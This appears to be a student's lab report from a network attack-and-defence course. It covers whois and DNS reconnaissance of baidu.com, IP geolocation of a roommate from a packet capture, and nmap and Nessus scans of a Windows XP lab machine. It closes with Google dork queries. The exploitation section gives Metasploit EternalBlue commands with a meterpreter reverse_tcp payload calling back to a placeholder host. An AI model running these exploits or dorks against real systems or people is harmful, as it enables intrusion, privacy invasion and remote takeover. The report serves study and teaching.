首页 > 其他分享 >20222422 2024-2025-1 《网络与系统攻防技术》实验五实验报告

20222422 2024-2025-1 《网络与系统攻防技术》实验五实验报告

时间:2024-11-30 20:21:25浏览次数:11  
标签:baidu 漏洞 端口 2024 2025 搜索 20222422 靶机 com

一、实验内容

(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:

DNS注册人及联系方式

该域名对应IP地址

IP地址注册人及联系方式

IP地址所在国家、城市和具体地理位置

PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息(要求必须用WHOIS、dig、nslookup、traceroute、tracert以及在线工具)

(2)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。

(3)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

靶机IP地址是否活跃

靶机开放了哪些TCP和UDP端口

靶机安装了什么操作系统,版本是多少

靶机上安装了哪些服务

(4)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

靶机上开放了哪些端口

靶机各个端口上网络服务存在哪些安全漏洞

你认为如何攻陷靶机环境,以获得系统访问权

(5)通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。并练习使用Google hack搜集技能完成搜索(至少10种搜索方法)

二、实验过程

(一)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取信息

选择的DNS域名:baidu.com

1、使用whois命令

whois baidu.com

image

image

获取信息如下:
DNS注册人:MarkMonitor Inc
DNS注册人联系方式:
(1)邮箱:abusecomplaints@markmonitor.com
(2)电话:+1.2086851750
IP地址所在国家:CN
城市:Beijing
具体地理位置:Beijing Baidu Netcom Science Technology Co., Ltd

2、使用nslookup命令

nslookup baidu.com

image

获取ip地址如下:
(1)39.156.66.10
(2)110.242.68.66

(1)使用whoise查询39.156.66.10
whois 39.156.66.10

image

获得信息:
IP注册人:haijun li
邮箱:hostmaster@chinamobile.com
地址: 29,Jinrong Ave, Xicheng district,beijing,100032
电话: +86 1052686688
还有其他信息

(2)使用whoise查询110.242.68.66
whois 110.242.68.66

image

获得信息:
IP注册人:Kong Lingfei
邮箱:konglf5@chinaunicom.cn
地址: 45, Guang An Street, Shi Jiazhuang City, HeBei Provin
电话: +86-311-86681601
还有其他信息

3、使用dig命令

dig baidu.com

image

可以看到同样获取了ip地址等信息,与之前获取的一致

4、使用traceroute命令

traceroute baidu.com

image

发现无法看到数据包到该网站所经过的路由的路径

5、使用tracert命令

该命令实在windows下使用的
tracert baidu.com

image

发现在抵达110.242.68.66之前经过了如上图的众多路由节点

6、使用在线网站查询

网址:https://uutool.cn/ip/

(1)查询39.156.66.10

image

(2)查询110.242.68.66
image

发现除了国家等地址,还有更加具体的经纬度信息和互联网服务提供商信息等

(二)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。

(1)和舍友打微信电话并打开抓包

image

ip查询结果如下:

image

ip属地为北京市丰台区,与舍友位置一致

(三)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令

靶机:winxp
靶机ip:192.168.198.148

1、ping扫描

nmap -sn 192.168.198.0/24

image

通过扫描结果可知,靶机在线

2、靶机开放了哪些TCP和UDP端口

通过命令nmap -sT -sU -p- 192.168.198.148来对靶机TCP和UDP端口进行扫描

image

开放的端口有:
TCP:135,139,445
UDP:123,137,138,445,500,1027,1900,4500

3、靶机安装了什么操作系统,版本是多少

nmap -O 192.168.198.148

image

可以看出操作系统是Microsoft Windows XP SP2 或者SP3

4、靶机上安装了哪些服务

nmap -sV 192.168.198.148

image

可以看出靶机安装了msrpc(微软远程过程调用)、netbios-ssn(网络基本输入输出系统的会话服务)、microsoft-ds(微软网络目录服务)。

(四)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令

1、下载nessus开源软件,过程参考:https://blog.csdn.net/m0_52985087/article/details/135170187
2、靶机上开放了哪些端口

靶机:winxp
靶机ip:192.168.198.148

点击右上角的new scan,选择host discovery

image

设置参数:

image

点击launch,开始扫描:

image

扫描结果如下:

image

发现开放了的端口有135,139,445

3、靶机各个端口上网络服务存在哪些安全漏洞

创建new scan,选择advanced scan,并设置参数:

image

扫描结果如下:

image

image

image

image

可以看出445端口的SMB/RPC服务存在MS09-001、MS08-067、MS17-010漏洞。

4、你认为如何攻陷靶机环境,以获得系统访问权

(1)MS09-001:

攻击者可以利用该漏洞,通过发送特制的SMB请求,在目标主机上执行任意代码。成功利用该漏洞后,攻击者可以获取到目标系统的完全控制权限。

(2)MS08-067:

攻击者可以通过发送精心构造的SMB请求,导致远程代码执行。该漏洞的利用可以让攻击者在目标系统上执行恶意代码,并可能进一步渗透网络。

(3)MS17-010:

该漏洞允许攻击者通过精心构造的SMB请求,发送恶意数据包到目标计算机,进而远程执行代码。攻击者可以利用该漏洞完全控制受害者系统。

(4)攻击步骤:

扫描目标主机的445端口,确认SMB服务是否开启。
nmap -p 445 --script smb-os-fingerprint <target_ip>

使用工具如Metasploit,检查目标系统是否易受MS09-001、MS08-067或MS17-010漏洞的攻击。
例如,使用Metasploit的auxiliary/scanner/smb/smb_ms17_010模块来检查MS17-010漏洞:
msfconsole

use auxiliary/scanner/smb/smb_ms17_010

set RHOSTS <target_ip>

run

如果目标存在漏洞,可以使用Metasploit等工具尝试利用该漏洞进行远程代码执行。例如,使用Metasploit的exploit/windows/smb/ms17_010_eternalblue模块来利用MS17-010漏洞:
msfconsole

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS <target_ip>

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <your_ip>

run

(五)搜索测试

1、通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题

搜索姓名:

image

发现都是无关我的信息,没有泄露

搜索学号:

image

发现有之前写的博客园实验报告信息,没有消息泄露

搜索电话号码:

image

发现只有号码段所在地区,未泄露信息

搜索身份证号:

image

发现也没有泄露消息

2、练习使用Google hack搜集技能完成搜索(至少10种搜索方法)

(1)搜索网页标题
intitle: login

搜索标题中包含“login”的页面

image

(2)搜索特定的URL结构
inurl:"login" "admin"

查找URL中包含“login”和“admin”的页面

image

(3)搜索特定网站的内容
site:baidu.com "username"

查找baidu.com网站上包含“username”字样的页面

image

(4) 搜索特定子域名
site:baidu.com -www

搜索会列出baidu.com下所有的子域名,排除www子域

image

(5)查找密码保护页面
inurl:"password"

该搜索可以帮助你找到登录或密码验证页面,可能会暴露某些弱密码的提示。

image

(6)搜索特定文件类型
filetype:pdf "批发"

该搜索可以帮助你找到包含“批发”字样的PDF文件。

image

(7)查找可能包含sql注入的网址
inurl: .php?id=

image

(8)查找页面内容
intext: admin

查找包含“admin”这个词的页面内容

image

(9)查找相似页面
related:https://www.besti.edu.cn/

查找与https://www.besti.edu.cn/ 布局相似的页面

image

(10)查看指定地方的天气
weather:beijing

查看北京的天气

image

三、问题及解决方案

问题一:在安装nessus的时候一开始在kali上安装,发现注册的时候总是不成功

问题一解决:发现是kali硬盘空间不足了,有两种解决方案:一种是扩容kali空间,一种是在windows下使用nessus,我选择的是后者

问题二:使用tracert命令在kali运行时发现报错

问题二解决:发现tracert是windows下的命令,换windows的cmd下执行得以解决

四、学习感悟、思考等

本次实验让我深入了解了网络安全领域中的信息收集、漏洞扫描和渗透测试的基本方法与技巧。在实验过程中,我首先学习使用了whois、dig和nslookup等工具。使用nmap和Nessus对靶机环境的扫描让我实际感受到漏洞扫描的重要性。通过nmap,我成功识别了靶机的活跃性、开放端口、操作系统及安装服务;而通过Nessus,我发现了靶机上的潜在安全漏洞,这为渗透测试和防护措施提供了有力的依据。实验中也让我认识到,渗透测试不仅仅是技术问题,更需要对系统的全面理解和风险评估。通过Google Hacking技巧的练习,我学习到了如何使用特定的搜索语法来发现网络中的潜在隐私泄漏和信息暴露。这种技能对于信息收集和漏洞挖掘具有重要意义,但同样要注意合法使用,避免侵犯他人隐私。
本次实验不仅让我掌握了网络安全的工具和技术,还加强了对信息安全伦理的认识。

参考资料

标签:baidu,漏洞,端口,2024,2025,搜索,20222422,靶机,com
From: https://www.cnblogs.com/20222422tky/p/18575982

相关文章

  • 20222414 2024-2025-1 《网络与系统攻防技术》实验七实验报告
    1.实验内容及要求1.1本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有(1)简单应用SET工具建立冒名网站(2)ettercapDNSspoof(3)结合应用两种技术,用DNSspoof引导特定访问到冒名网站。1.2本周学习内容(1)web安全基础:学习了web前端和后端的概念......
  • The solution to NOIP2024·T1——edit
    ThesolutiontoNOIP2024·T1——edithttps://www.luogu.com.cn/problem/P11361这是我在赛场想出来的思路,平时一个绿题都写不出来的题竟然一眼出思路,也真是RP++;思路由题目中的非限制的数可以互相交换,想到对于每一段连续的非限制性的区间都可以任意排布位置。那么可以把t序......
  • 2024CCPC郑州邀请赛(组队VP)
    B.扫雷1面:T0xel喜欢玩扫雷,但是他玩的扫雷游戏有名为“地雷探测器”的特殊道具。具体来说,T0xel会进行$n$轮扫雷。每轮扫雷开始之前,T0xel会获得1枚扫雷币。扫雷币在每轮扫雷结束后不会回收,可以保留至下一轮扫雷。T0xel知道,在第$i$轮$(1\leqi\leqn)$扫雷中,......
  • 20222406 2024-2025-2 《网络与系统攻防技术》实验七实验报告
    202224062024-2025-2《网络与系统攻防技术》实验七实验报告1.实验内容应用SET工具,通过多步操作建立冒名网站,获取登录信息。利用ettercap实施DNSspoof攻击,篡改特定网站IP。结合两种技术,用DNSspoof引导访问至冒名网站。2.实验过程2.1简单应用SET工具建立冒名......
  • NOIP2024 游寄
    NOIP2024Day0最后抱佛脚,教练让我们看点双边双,才发现原来我只写过强连通分量的Tarjan,写了几个模板。在本校考,所以去机房试机,擦了以下设备。发现学校机房电脑居然是十代i5。内存加到16G了,应该不会再像CSP2023和CSP2024开考半小时死机了。准考证号90+,感觉1=渺茫。Day1出门忘......
  • 学期:2024-2025-1 学号:20241303 《计算机基础与程序设计》第10周学习总结
    作业信息这个作业属于哪个课程<班级的链接>(如2024-2025-1-计算机基础与程序设计)这个作业要求在哪里<作业要求的链接>(如2024-2025-1计算机基础与程序设计第十周作业)这个作业的目标<写上具体方面>计算机科学概论(第七版)第12,13,14章并完成云班课测试,《C语言程序设计......
  • 20222325 2024-2025-1 《网络与系统攻防技术》实验七实验报告
    1.实验内容本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有:(1)简单应用SET工具建立冒名网站;(2)ettercapDNSspoof;(3)结合应用两种技术,用DNSspoof引导特定访问到冒名网站。2.实验过程2.1简单应用SET工具建立冒名网站攻击机kali的IP地......
  • 2024NOIP
    T1编辑字符串题意给定两个字符串,某些位置固定不动,其余相邻位置可以互换,求最大匹配长度方案考虑将俩串分为多段,使得每段互相匹配长度最长将相邻可换的部分划为一段,不可交换位置的单独一段。由下图可知,若A串某位置字符与B串两个位置字符都可以匹配,则它与一个匹配之后会拆......
  • 20222413 2024-2025-1 《网络与系统攻防技术》实验五实验报告
    1.实验内容本周学习内容为web安全。在课程中我学习到了web的基本知识,如前后端和使用的编程语言。此外还有web安全中的sql注入,如何通过在网址中加入SQL语言攻击网站数据库,对网站进行破坏或信息获取。实验要求:1.1从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进......
  • 【专题】2024汽车电动化报告汇总PDF洞察(附原数据表)
    原文链接: https://tecdat.cn/?p=38375在当今时代,汽车行业正经历着深刻且全面的变革,各个领域均呈现出独特的发展态势与趋势。出行方面,电动车车主虽以车为主要通勤工具,却积极采用多种交通工具组合出行,展现出对高效通勤的追求与现代交通资源的灵活运用。文末403份汽车行业研究报告......